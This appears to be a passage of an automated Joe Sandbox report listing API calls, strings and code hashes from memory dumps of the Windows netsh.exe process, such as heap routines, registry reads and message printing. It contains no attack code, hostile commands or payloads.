               • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID:
              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
              • API String ID: 0-871070163
              • Opcode ID: 8257d740a266ef8b6851536985c8a7cef2b84cee41e3a8cba30d7df620a3679f
              • Instruction ID: 1eb8360af4e4c8807a20b8e51dcfaf8c111e1ce9020effaa694cf6e6f3cb73b4
              • Opcode Fuzzy Hash: 8257d740a266ef8b6851536985c8a7cef2b84cee41e3a8cba30d7df620a3679f
              • Instruction Fuzzy Hash: FB41E2357047029FC721EE25CC41B6AB7E5EF88720F140A2EF996DB281DB31E8058BB1
              APIs
              • PrintMessage.NETSH(%1!s!,?), ref: 01562F05
                • Part of subcall function 01567241: _wcsicmp.MSVCRT ref: 01567267
                • Part of subcall function 01567241: _wcsicmp.MSVCRT ref: 01567287
                • Part of subcall function 01567241: _wcsicmp.MSVCRT ref: 015672B0
              • PrintMessageFromModule.NETSH(00000065), ref: 01562E37
                • Part of subcall function 01567EA0: LoadStringW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(0156471D,?,?,00004000,?,00000000,?,?,0156471D,000000B6,?), ref: 01567ED0
                • Part of subcall function 01567EA0: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(0156471D,GetResourceString,?,0156471D,000000B6,?), ref: 01567EE2
              • PrintMessageFromModule.NETSH(00000064,?), ref: 01562F1A
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
               • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
               • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: MessagePrint_wcsicmp$FromModule$AddressLoadProcString
              • String ID: %1!s!
              • API String ID: 3716039470-1485915839
              • Opcode ID: 2f6ea197613e495ba6a8bc9a29b109ae02ad53ffcb9d9c39d6f15f56851f067b
              • Instruction ID: ccf25841f68005d3d5cacf1bfe1a2c7c3932a3f93b689271ad142f81b25c96d5
              • Opcode Fuzzy Hash: 2f6ea197613e495ba6a8bc9a29b109ae02ad53ffcb9d9c39d6f15f56851f067b
              • Instruction Fuzzy Hash: 8C41243560011A8FCB21EF64DC91AAEB37AFF94310F1181A9DB0A6F254CB31AD54CBD9
              APIs
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DC728C
              Strings
              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 00DC7294
              • RTL: Resource at %p, xrefs: 00DC72A3
              • RTL: Re-Waiting, xrefs: 00DC72C1
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
               • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmp
               • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmp
               • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
              • API String ID: 885266447-605551621
              • Opcode ID: b511b6fd750fc25fc145e0993ddb6b45413d23af22368944110f941c9a1fdfc4
              • Instruction ID: 8394f9681d5e97a2ff9fdafd07df3399c0a6a84b8961069a5842a3c6c50c8266
              • Opcode Fuzzy Hash: b511b6fd750fc25fc145e0993ddb6b45413d23af22368944110f941c9a1fdfc4
              • Instruction Fuzzy Hash: 6B41F231704613ABC720DE25CC42F66B7A5FB54724F18061AF895EB281DB20E8069BF5
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
               • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmp
               • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmp
               • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID: ___swprintf_l
              • String ID: %%%u$]:%u
              • API String ID: 48624451-3050659472
              • Opcode ID: ef6ff55984bc854589c8ea3269a5e5234823ac86234fe4b8c3ba555b7640d256
              • Instruction ID: ce7620057b5d0db99bb326cbb06a6b07957a3a53f488efa8bb9e2ef1f82ce5e9
              • Opcode Fuzzy Hash: ef6ff55984bc854589c8ea3269a5e5234823ac86234fe4b8c3ba555b7640d256
              • Instruction Fuzzy Hash: F2318672A002199FCB20DF29CC45BEEB7F8EB54714F445559E949E3281EB349E858FA0
              APIs
              • RegGetValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,System\CurrentControlSet\Services\RemoteAccess\Parameters,MultiTenancyEnabled,00000018,00000000,00000000,00000004), ref: 01568C30
              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000), ref: 01568C52
              Strings
              • MultiTenancyEnabled, xrefs: 01568C23
              • System\CurrentControlSet\Services\RemoteAccess\Parameters, xrefs: 01568C28
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
               • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
               • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: CloseValue
              • String ID: MultiTenancyEnabled$System\CurrentControlSet\Services\RemoteAccess\Parameters
              • API String ID: 3132538880-1071825540
              • Opcode ID: d6cad0ca300f7735eced3e3d7afcec5430b9dbf2c3716ec8158c78b1f8a7a259
              • Instruction ID: 76d75dae8e24ab14d84ca4d072041aaa99beb2cf538f2d3c2075d4809576e9f8
              • Opcode Fuzzy Hash: d6cad0ca300f7735eced3e3d7afcec5430b9dbf2c3716ec8158c78b1f8a7a259
              • Instruction Fuzzy Hash: CE014B71901218FBDB228B95E90ABDEBBB8FB04366F114164E911AA244D7708B5CEBD0
              APIs
              • MatchToken.NETSH(?,help), ref: 0156439F
                • Part of subcall function 01567690: _wcsnicmp.MSVCRT ref: 015676BC
              • MatchToken.NETSH(?,015612B0,?,help), ref: 015643B0
                • Part of subcall function 01563B75: _wcsicmp.MSVCRT ref: 01563BA6
                • Part of subcall function 01563B75: RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,SOFTWARE\Microsoft\NetSh,00000000,STRING,00000000,000F003F,00000000,?,00000000), ref: 01563BE3
                • Part of subcall function 01563B75: _wcsdup.MSVCRT ref: 01563BF4
                • Part of subcall function 01563B75: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 01563C07
              • PrintMessageFromModule.NETSH(00000068,?,015612B0,?,help), ref: 015643CE
                • Part of subcall function 01567EA0: LoadStringW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(0156471D,?,?,00004000,?,00000000,?,?,0156471D,000000B6,?), ref: 01567ED0
                • Part of subcall function 01567EA0: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(0156471D,GetResourceString,?,0156471D,000000B6,?), ref: 01567EE2
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
               • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
               • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: MatchToken$AddressCloseCreateFromLoadMessageModulePrintProcString_wcsdup_wcsicmp_wcsnicmp
              • String ID: help
              • API String ID: 611077269-143088812
              • Opcode ID: 502917dd1d7752505ca799359846dcf651abf31111e5b3aef123cfb4f7c7cd19
              • Instruction ID: 37bf6deac9e7671cb9f4e2ae1ef311f1e6b417fb6fd5ce6856b214060ace49e7
              • Opcode Fuzzy Hash: 502917dd1d7752505ca799359846dcf651abf31111e5b3aef123cfb4f7c7cd19
              • Instruction Fuzzy Hash: 91F04936300617AA9A126E9DA945D3E376DFB94224F004026F900DF150EB21EC61C7D2
              APIs
              • OpenEventW.API-MS-WIN-CORE-SYNCH-L1-1-0(001F0003,00000000,NetshStopRefreshEvent), ref: 01568078
              • SetEvent.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 01568085
              • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 0156808C
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
               • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
               • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Event$CloseHandleOpen
              • String ID: NetshStopRefreshEvent
              • API String ID: 1560313832-639338441
              • Opcode ID: 5ee12e9c8e396d4ab8f3abd5489015d6c4a959fa22840ed28ea578cf43868297
              • Instruction ID: 47f1a55f9adab72547e2d6cb72d83e5e0a9aae82faa6c9d900574359d389066c
              • Opcode Fuzzy Hash: 5ee12e9c8e396d4ab8f3abd5489015d6c4a959fa22840ed28ea578cf43868297
              • Instruction Fuzzy Hash: 43E0C232591B24ABDB3266767C0EFAF7A9CAB48736F024424F729EF140CA70841582F4
              APIs
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?), ref: 01563522
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01563529
              • memcpy.MSVCRT ref: 01563548
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0156358E
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01563595
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
               • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
               • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$Process$AllocFreememcpy
              • String ID:
              • API String ID: 3405790324-0
              • Opcode ID: d06dbd015da1cd08c42469fcc78f50be9e07c25b46d3852ff21140b42b18e8e6
              • Instruction ID: fac22a34efd301d10a5c00bd4335214b7f1db7035b19f025422c1f4c361d8c98
              • Opcode Fuzzy Hash: d06dbd015da1cd08c42469fcc78f50be9e07c25b46d3852ff21140b42b18e8e6
              • Instruction Fuzzy Hash: B8110BF1800105EFCB51CF64E80A959BBF9FB44324B024055EC18DF244D770E908EF90
              APIs
              • ConvertGuidToString.NETSH(?,?), ref: 0156417C
              • PrintMessageFromModule.NETSH(000000C8,?,?), ref: 0156419F
                • Part of subcall function 01567EA0: LoadStringW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(0156471D,?,?,00004000,?,00000000,?,?,0156471D,000000B6,?), ref: 01567ED0
                • Part of subcall function 01567EA0: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(0156471D,GetResourceString,?,0156471D,000000B6,?), ref: 01567EE2
              • PrintMessageFromModule.NETSH(000000C9), ref: 015641B6
              • PrintMessageFromModule.NETSH(000000CA,?), ref: 015641D3
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
               • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
               • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: FromMessageModulePrint$String$AddressConvertGuidLoadProc
              • String ID:
              • API String ID: 2510173387-0
              • Opcode ID: 37030f197afaac29ebc6c757f92958de38e556a3aecdcfcec85d5e6912839458
              • Instruction ID: 805009ec8aa8189d7986e65845223f15227ecc414637fed137aa934392e8acea
              • Opcode Fuzzy Hash: 37030f197afaac29ebc6c757f92958de38e556a3aecdcfcec85d5e6912839458
              • Instruction Fuzzy Hash: 64218072A0020ADFDB18DF64DC81CAEB7BDFBA4314B114129D919AF255EB31AD46CBC0
              APIs
              • _wfopen.MSVCRT ref: 01566969
              • PrintMessageFromModule.NETSH(0000006C,?,?,?,?,01562514), ref: 01566980
                • Part of subcall function 01567EA0: LoadStringW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(0156471D,?,?,00004000,?,00000000,?,?,0156471D,000000B6,?), ref: 01567ED0
                • Part of subcall function 01567EA0: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(0156471D,GetResourceString,?,0156471D,000000B6,?), ref: 01567EE2
              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 01566988
              • fclose.MSVCRT ref: 015669B7
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
               • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
               • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: AddressErrorFromLastLoadMessageModulePrintProcString_wfopenfclose
              • String ID:
              • API String ID: 2254135562-0
              • Opcode ID: 495b0b6a2950c0df7290e18b91f444530493aaa97bd774678804256e1b4b2727
              • Instruction ID: a427673b0d1ef76eecccac01587aee1e118e3a7cccd36549e6c817b16b5fed43
              • Opcode Fuzzy Hash: 495b0b6a2950c0df7290e18b91f444530493aaa97bd774678804256e1b4b2727
              • Instruction Fuzzy Hash: E501A7B2E00211ABD720DB6EF80585ABBEDF785674706402FF515DF208EB709D04ABD0
              APIs
              • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000900,?,?,00000000,?,00000000,?), ref: 01567F68
              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 01567F74
              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 01567F7E
              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 01567F97
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
               • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
               • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: ErrorFormatFreeHandleLastLocalMessage
              • String ID:
              • API String ID: 1910557688-0
              • Opcode ID: 433ac53dd7f6b499c3ddf3b729994e0ac45ddcab5ce3fef7124a8219f25a06ce
              • Instruction ID: 7a70ee37c317981335324a4c84e8e1fd6c08fe4f5f28256d91c9cc92a60cb671
              • Opcode Fuzzy Hash: 433ac53dd7f6b499c3ddf3b729994e0ac45ddcab5ce3fef7124a8219f25a06ce
              • Instruction Fuzzy Hash: FEF03175910118FFDF169B94E809DEE7BBDFB48224F114255F92297240E7709F44DBA0
              APIs
                • Part of subcall function 015699B8: GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 015699BF
              • __set_app_type.MSVCRT ref: 01569412
              • __p__fmode.MSVCRT ref: 01569428
              • __p__commode.MSVCRT ref: 01569436
              • __setusermatherr.MSVCRT ref: 01569457
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
               • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
               • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
              • String ID:
              • API String ID: 1632413811-0
              • Opcode ID: c00765f416064b1474cfa8d4d23b08f3321ccf9e893ff38eec4e61602cb0fd07
              • Instruction ID: cf70e429b3c6e2bb85968b2787085c5e5955868644fb52ba22803a4a1fc3c472
              • Opcode Fuzzy Hash: c00765f416064b1474cfa8d4d23b08f3321ccf9e893ff38eec4e61602cb0fd07
              • Instruction Fuzzy Hash: 4DF0D4B05083439FC7786F70B44E5483BA8F79433AB12061DD4728F2D8CB7A8059EB60
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
               • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmp
               • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmp
               • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID: __aulldvrm
              • String ID: +$-
              • API String ID: 1302938615-2137968064
              • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
              • Instruction ID: 81de4468c5a3e97719ca50edf6af0132c44021d3603fd50f94d9db8b8bd236ab
              • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
              • Instruction Fuzzy Hash: 20919070E1821A9BDF24DF69C881ABEB7A5EF44720F68465AF855E72C0EB30DD409770
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
               • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmp
               • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmp
               • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID:
              • String ID: $$@
              • API String ID: 0-1194432280
              • Opcode ID: 37f37fdd7124950a745e4215b847fd39ee0cbf7ac737b0f48f61bfee29ac03a7
              • Instruction ID: 2a53435ed3d7c2bac5e800c7b2d00d7a03d05e894b8dcf4202e690d7d70c6735
              • Opcode Fuzzy Hash: 37f37fdd7124950a745e4215b847fd39ee0cbf7ac737b0f48f61bfee29ac03a7
              • Instruction Fuzzy Hash: E1811C76D00269DBDB31CB54CC55BEEB7B4AB09750F0441DAA91AB7280D7709E85CFB0
              APIs
              • LoadStringW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(0156471D,?,?,00004000,?,00000000,?,?,0156471D,000000B6,?), ref: 01567ED0
              • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(0156471D,GetResourceString,?,0156471D,000000B6,?), ref: 01567EE2
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
               • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
               • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: AddressLoadProcString
              • String ID: GetResourceString
              • API String ID: 2390443819-1598891890
              • Opcode ID: 0244da047c18d1797c12ea91a8fdc83080894952c15a7687ae0edee93119d8c8
              • Instruction ID: f0e5388707e86eee2144c3b6b3f05d7044c210776e51439c0ebf1243bcbbabdf
              • Opcode Fuzzy Hash: 0244da047c18d1797c12ea91a8fdc83080894952c15a7687ae0edee93119d8c8
              • Instruction Fuzzy Hash: 1701C83560011D9BDB219F18DC40DAEB7BDFB94664F0181A5E915EB204EE30DD088FD0
              APIs
              • memset.MSVCRT ref: 01564CDC
              • RegisterContext.NETSH(?), ref: 01564D22
                • Part of subcall function 015645E0: wcschr.MSVCRT ref: 01564620
                • Part of subcall function 015645E0: wcschr.MSVCRT ref: 01564635
                • Part of subcall function 015645E0: wcschr.MSVCRT ref: 01564675
                • Part of subcall function 015645E0: wcschr.MSVCRT ref: 01564685
                • Part of subcall function 015645E0: PrintMessageFromModule.NETSH(000000B5,?), ref: 0156469E
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
               • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
               • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: wcschr$ContextFromMessageModulePrintRegistermemset
              • String ID: netsh
              • API String ID: 1453721150-4166728403
              • Opcode ID: 44cf3ccde5ffc4cb8e9abd59e952806de65391085250b2c0cd615a2c625fa125
              • Instruction ID: 920cfc9e8828ded8730f8de8375a926506d13aee8c257b163b70aee410b45c09
              • Opcode Fuzzy Hash: 44cf3ccde5ffc4cb8e9abd59e952806de65391085250b2c0cd615a2c625fa125
              • Instruction Fuzzy Hash: BF0119B1E002199BCB10DF95C848BDEBBF8BB95318F104419D814AF240D7B55A0ACBA9
              APIs
                • Part of subcall function 01565EB0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,0000000C,?,00000000,?,?,?,?,015651DC,?,?,?,01564B22,?,?,?), ref: 01565D5D
                • Part of subcall function 01565EB0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,015651DC,?,?,?,01564B22,?,?,?,?,?), ref: 01565D64
                • Part of subcall function 01565EB0: PrintMessageFromModule.NETSH(00000068,?,?,015651DC,?,?,?,01564B22,?,?,?,?,?), ref: 01565E91
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,00000000,?,?,?,?,01564B22,?,?,?,?,?), ref: 0156525B
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,01564B22,?,?,?,?,?), ref: 01565262
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,?,?,?,01564B22,?,?,?,?,?), ref: 01565286
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,01564B22,?,?,?,?,?), ref: 0156528D
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$Process$Alloc$FreeFromMessageModulePrint
              • String ID:
              • API String ID: 206731548-0
              • Opcode ID: bf09bf30c3fecbe1a841659cacbacc67038bb166555aca7d8457eeff52ee932c
              • Instruction ID: a2b91806fd3b148b0ad253c215020c651318c041913f18b347c4ee7338bf35e3
              • Opcode Fuzzy Hash: bf09bf30c3fecbe1a841659cacbacc67038bb166555aca7d8457eeff52ee932c
              • Instruction Fuzzy Hash: DC31D8316602029BCB259FA8C4846AEB7E9FF44394B588518F90ADF201F731E945C7D0
              APIs
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,?,?,01564EFC,?,00000001,?,?,015684AB,00000000,?,?), ref: 015652ED
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,01564EFC,?,00000001,?,?,015684AB,00000000,?,?,?,01564CB5,?,00000002,?), ref: 015652F4
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,01564EFC,?,00000001,?,?,015684AB,00000000,?), ref: 0156533C
              • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,01564EFC,?,00000001,?,?,015684AB,00000000,?,?,?,01564CB5,?,00000002,?), ref: 01565343
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$AllocProcess
              • String ID:
              • API String ID: 1617791916-0
              • Opcode ID: b281bf8372cd506c0d9155db83cb3f63765e8e4bc11365ef5cdaddda0f1255a6
              • Instruction ID: 23832820c302f777321bfb30f09595748b0b640a41d451e8bc3e888e179cf104
              • Opcode Fuzzy Hash: b281bf8372cd506c0d9155db83cb3f63765e8e4bc11365ef5cdaddda0f1255a6
              • Instruction Fuzzy Hash: 40210236750101DBCB269F6DDC498ABB7ACFF846503594929ED0ACB204F671AD06CBA0
              APIs
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,00000000,?,?,00000003), ref: 0156673C
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01566743
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000001,00000000,?,?,00000003), ref: 0156674F
              • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01566756
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$AllocProcess
              • String ID:
              • API String ID: 1617791916-0
              • Opcode ID: 631cff4eda95c2459fb754251c44db7641b9b8c66f01203d7e5b70c3fa332863
              • Instruction ID: da4270bead903f881f7c13dc9ccee59e8a7b6b890002de6a32cfc13e19d673c9
              • Opcode Fuzzy Hash: 631cff4eda95c2459fb754251c44db7641b9b8c66f01203d7e5b70c3fa332863
              • Instruction Fuzzy Hash: 8611A336600215AFCB219F68D44DB8E7BADFB85365F114529F515CF294EA74AC0487A0
              APIs
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 015623E4
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 015623EB
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 015623FA
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01562401
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$FreeProcess
              • String ID:
              • API String ID: 3859560861-0
              • Opcode ID: a184ae0f57a6df1372452554e995cd8a509d656b3a9c35ffdee4aa0f69c0a172
              • Instruction ID: 0e92385aeb28a91595724fd956908a9ae94167363f91be526afb59fc857ff859
              • Opcode Fuzzy Hash: a184ae0f57a6df1372452554e995cd8a509d656b3a9c35ffdee4aa0f69c0a172
              • Instruction Fuzzy Hash: 9EF0C272A211109BD7324F6AE80DA6A7A2DBF41735F168019F45D8F281C3309842DBE0
              APIs
